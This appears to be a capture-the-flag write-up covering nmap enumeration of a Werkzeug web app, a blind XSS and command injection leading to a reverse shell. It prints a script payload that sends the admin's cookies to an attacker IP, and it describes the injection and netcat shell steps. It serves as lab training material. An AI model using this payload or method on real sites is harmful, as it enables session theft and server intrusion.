### NMAP

```bash
nmap -p- --min-rate=10000 -v $IP

PORT     STATE SERVICE
22/tcp   open  ssh
5000/tcp open  upnp
```

```bash
nmap -p22,5000 -sVC -v $IP

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 90:02:94:28:3d:ab:22:74:df:0e:a3:b2:0f:2b:c6:17 (ECDSA)
|_  256 2e:b9:08:24:02:1b:60:94:60:b3:84:a9:9e:1a:60:ca (ED25519)

5000/tcp open  http    Werkzeug httpd 2.2.2 (Python 3.11.2)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-title: Under Construction
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### ENUMERATING THE WEB SERVER

SINCE IT IS RUNNING ON PYTHON FIRST VULN CAME TO MY MIND IS SSTI

TESTED BASIC SSTI AND WE CAN SOME ERROR

![image.png](attachment:10d7e9a8-2e33-4495-8c7e-5bb31ca78caa:image.png)

IT SAYS YOUR BROWSER INFO WILL BE SHARED WITH ADMINSTRATOR

Trying a simple blind xss payload

![image.png](attachment:719baa47-801c-43c2-b7c9-95d15b475f25:image.png)

WE GOT A PING FROM THW WEB SERVER

![image.png](attachment:cf087232-bdbd-4ecb-8f53-06902b9c8aa7:image.png)

STEALING THE COOKIES

![image.png](attachment:efc7db2f-6286-4ed8-aa51-67055ca593cf:image.png)

![image.png](attachment:97a26943-27b9-4f7c-b6ab-a024d7cf69f8:image.png)

```bash
<script> 
fetch('http://10.10.16.3:80/?cookie='+document.cookie)
  .then(response => response.json())
  .then(data => console.log(data))
  .catch(error => console.error('Error:', error)); 
</script>
```

NOW NAVIGATING TO THE dashboard we got page with the cookie

![image.png](attachment:a359433d-93c4-45ca-baf2-9b79ec95e219:image.png)

Here is a simple generate report functionality

![image.png](attachment:82acc32b-de88-47fd-80a0-01944ffbe752:image.png)

IT USES A DATE POST PARAMETER MAYBE THEY RUN SOME SCRIPTS IN BACKGROUNG SO TRYING COMMAND INJECTION

![image.png](attachment:5471a5d7-d644-4dbe-8158-d6bb75cfb621:image.png)

NOW GETTING A REVERSE SHELL USING NC

![image.png](attachment:81fc6efb-9cc3-487f-a07f-ab4dee46b225:image.png)

![image.png](attachment:17e44d0d-6e4d-4fe4-8e80-c6d43b19299f:image.png)

![image.png](attachment:512723cc-3206-4b28-9cd2-0f1236d3ef4a:image.png)

GOT THE USERS FLAG
